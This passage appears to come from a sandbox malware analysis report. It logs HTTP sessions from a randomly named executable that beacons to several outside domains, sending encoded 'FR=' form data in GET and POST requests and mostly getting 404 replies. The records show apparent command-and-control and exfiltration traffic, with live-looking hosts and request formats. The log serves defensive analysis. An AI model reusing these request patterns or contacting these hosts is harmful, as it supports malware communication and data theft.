              Sep 6, 2024 09:05:32.775672913 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:32 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:32.775707006 CEST | 1236 | IN | Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:32.775719881 CEST | 1236 | IN | Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:32.775732040 CEST | 115 | IN | Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              8 | 192.168.2.6 | 49734 | 162.240.81.18 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:34.753987074 CEST | 536 | OUT | GET /wxmz/?FR=/3704Vff3w19bJxFjboY/IbcCRxq7QB064cYUEYQjha4p4PIlcXs4dWmoF91tthlGgXSeDBpFM7AphPZ13xvSCd02IeXzvs2jATKINKka4nP9dH8TaBgBhg9ZbFNrO+hXaJ7nrQ=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.sorriragora.online
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:35.323096037 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:35 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:35.323205948 CEST | 1236 | IN | Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:35.323220015 CEST | 1236 | IN | Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:35.323237896 CEST | 115 | IN | Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              9 | 192.168.2.6 | 49736 | 192.185.16.209 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:41.032069921 CEST | 812 | OUT | POST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=E/XsfnCc7DfmLgNi4atCs9+IbFYjlmevuEGva1ZexHa1aGUtCRX1qCT8SuywUoICaCcPpuHOIdhDbbZAVdMOQHPg6B4XeKpstrAx0Z3zg1F866g1jSvOi95hydzJdUx/LJzy/uELLOgHiKMuPWB0z/2AYxvi/PMAr5c1mlPzdWM0iNV6/vP+D1FFBJo3+dP98oXLNN3R1+09
              Sep 6, 2024 09:05:41.648008108 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:41 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              10 | 192.168.2.6 | 49737 | 192.185.16.209 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:43.572170019 CEST | 836 | OUT | POST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=E/XsfnCc7DfmZTli+N5Ck9+HFVYj+WfHuEKva31OxxK1ZjwtBQX1pCT8HeysJ4IZaCQHpv7OIdlDbZBAVqgNRXPijx4RDapstrAx0Zykg1N89KQ1j27Pod5g69zJKkxzLJyX/qMtLNYHiL8uPHB3gf2GWRusuOhfzZ1ahm/JNlI0qbUgjcPdRllHBLwF+9PX+ovLfa726KReNqhXmYQDeP7Uv7EMGhDVtQ==
              Sep 6, 2024 09:05:44.232013941 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:44 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              11 | 192.168.2.6 | 49738 | 192.185.16.209 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:46.117055893 CEST | 1849 | OUT | POST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:46.700680971 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:46 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              12 | 192.168.2.6 | 49739 | 192.185.16.209 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:48.671171904 CEST | 537 | OUT | GET /xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.homebizsuccess.blog
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:49.277040005 CEST | 563 | IN | HTTP/1.1 301 Moved Permanently
              Date: Fri, 06 Sep 2024 07:05:49 GMT
              Server: nginx/1.23.4
              Content-Type: text/html; charset=UTF-8
              Content-Length: 0
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              X-Redirect-By: WordPress
              Location: http://homebizsuccess.blog/xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              X-Server-Cache: true
              X-Proxy-Cache: MISS


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              13 | 192.168.2.6 | 49741 | 154.23.184.240 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:59.752734900 CEST | 782 | OUT | POST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 6e 6f 38 67 51 4e 6f 42 39 59 72 65 68 41 79 71 63 4e 5a 76 42 55 2f 63 31 64 65 51 70 75 51 74 69 61 78 77 75 4b 4c 56 6c 69 7a 39 5a 57 5a 77 44 4d 76 47 53 65 55 45 47 52 34 33 70 58 5a 7a 56 6d 36 76 61 42 72 55 79 61 2b 66 64 75 4c 4d 55 41 76 59 35 54 59 67 76 64 35 6d 74 52 34 31 31 45 31 4f 71 46 49 2b 69 5a 4a 79 49 72 37 6e 4a 69 6f 6c 6f 49 44 45 39 51 4f 5a 50 4a 52 6e 32 48 67 45 65 6e 4c 35 72 49 36 6c 64 7a 35 55 49 43 6f 4c 59 35 67 79 35 55 4a 42 37 69 64 44 36 55 62 51 6a 42 4f 66 6b 55 4b 36 35 6a 30 5a 4a 35 64 41 4d 6e 58 62 5a 4a 6f 34 2b 53 2f 59 68 5a 58 37 4f 46 6c 65 5a 6a 59
              Data Ascii: FR=Eno8gQNoB9YrehAyqcNZvBU/c1deQpuQtiaxwuKLVliz9ZWZwDMvGSeUEGR43pXZzVm6vaBrUya+fduLMUAvY5TYgvd5mtR411E1OqFI+iZJyIr7nJioloIDE9QOZPJRn2HgEenL5rI6ldz5UICoLY5gy5UJB7idD6UbQjBOfkUK65j0ZJ5dAMnXbZJo4+S/YhZX7OFleZjY
              Sep 6, 2024 09:06:00.669884920 CEST | 312 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:00 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              14 | 192.168.2.6 | 49742 | 154.23.184.240 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:02.289906979 CEST | 806 | OUT | POST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 6e 6f 38 67 51 4e 6f 42 39 59 72 66 42 77 79 6f 37 78 5a 2b 78 55 34 5a 31 64 65 65 35 75 55 74 69 57 78 77 73 6d 62 56 7a 61 7a 7a 5a 47 5a 78 47 67 76 42 53 65 55 57 6d 52 35 36 4a 58 6b 7a 56 69 79 76 61 39 72 55 79 4f 2b 66 59 4b 4c 4d 6e 59 67 4a 35 54 61 31 66 64 37 37 39 52 34 31 31 45 31 4f 71 51 74 2b 6d 4e 4a 79 35 62 37 6d 6f 69 72 35 34 49 45 55 64 51 4f 53 76 4a 56 6e 32 47 7a 45 66 72 6c 35 6f 77 36 6c 63 44 35 56 5a 43 72 42 59 35 36 74 70 56 63 49 70 58 6a 4d 6f 4a 61 51 77 64 51 43 6a 49 61 79 76 69 75 46 36 35 2b 53 63 48 56 62 62 52 61 34 65 53 56 61 68 68 58 70 5a 4a 43 52 74 47 37 6a 32 54 4a 75 77 56 51 33 4f 6f 50 62 53 67 78 56 67 52 32 46 51 3d 3d
              Data Ascii: FR=Eno8gQNoB9YrfBwyo7xZ+xU4Z1dee5uUtiWxwsmbVzazzZGZxGgvBSeUWmR56JXkzViyva9rUyO+fYKLMnYgJ5Ta1fd779R411E1OqQt+mNJy5b7moir54IEUdQOSvJVn2GzEfrl5ow6lcD5VZCrBY56tpVcIpXjMoJaQwdQCjIayviuF65+ScHVbbRa4eSVahhXpZJCRtG7j2TJuwVQ3OoPbSgxVgR2FQ==
              Sep 6, 2024 09:06:03.167438984 CEST | 312 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:03 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              15 | 192.168.2.6 | 49743 | 154.23.184.240 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:04.839206934 CEST | 1819 | OUT | POST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:05.778408051 CEST | 312 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:05 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              16 | 192.168.2.6 | 49744 | 154.23.184.240 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:07.384383917 CEST | 527 | OUT | GET /gd7t/?yXghy=KTox&FR=JlAcjlx2Gdg+DXM3i59+nmMFZHdISfOX/D3i1++YLzSS1YHv0m41CgGfSm0I/piMileZ/olvBUKxdIaFHHAoN7eK5KUeh7JInwAPNKMw/FJo5s/UjYShm5Z/UsIKNOFZiX+3bL8= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.hm62t.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:08.286851883 CEST | 312 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:08 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              17 | 192.168.2.6 | 49745 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:21.509947062 CEST | 794 | OUT | POST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 58 45 42 52 57 67 71 52 4e 7a 34 48 2f 73 79 4f 52 2f 42 47 4b 6d 7a 78 77 56 66 2f 43 68 4f 68 79 66 66 30 56 76 42 58 45 59 6c 77 41 53 4c 67 65 69 74 68 70 4f 43 45 43 45 6c 56 7a 4a 61 30 36 78 45 48 4e 58 31 4a 67 52 39 44 55 73 73 63 58 66 59 50 45 63 4a 4b 64 70 31 48 63 6e 74 4d 52 59 71 66 46 78 46 42 6d 76 45 69 2f 52 67 31 44 57 59 70 76 73 70 74 77 78 39 42 69 56 31 5a 65 53 77 47 71 72 4e 79 69 66 37 67 74 71 65 45 6f 77 51 71 47 59 43 4e 79 76 50 51 39 69 46 51 44 4b 6d 48 47 43 41 55 58 59 47 58 56 7a 7a 44 4f 59 71 37 55 46 62 46 42 68 32 6a 4f 56 6e 30 6d 30 78 41 43 4a 48 41 65 37 2b 31
              Data Ascii: FR=XEBRWgqRNz4H/syOR/BGKmzxwVf/ChOhyff0VvBXEYlwASLgeithpOCECElVzJa06xEHNX1JgR9DUsscXfYPEcJKdp1HcntMRYqfFxFBmvEi/Rg1DWYpvsptwx9BiV1ZeSwGqrNyif7gtqeEowQqGYCNyvPQ9iFQDKmHGCAUXYGXVzzDOYq7UFbFBh2jOVn0m0xACJHAe7+1
              Sep 6, 2024 09:06:22.183772087 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:22 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              18 | 192.168.2.6 | 49746 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:06:24.067521095 CEST | 818 | OUT | POST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=XEBRWgqRNz4Hu/6OTc5GbWz281f/ZROlyfj0VrxHEtNwBzbgdgVhqOCEaUlQ3Ja/6xIPNWZJgR5DUokcUswOEMJII51FTHtMRYqfFxRrmvci/C41D0gqlMpu3x9Bo11deSxrqoIvicDgtviEri4pMYCL8PO00CA4a4/nCR84A7HzQFyZSrqYGV7HBjuRO1nek0JAQeLnRPbWerRmK8pR1w7UCvSToJ9dcg==
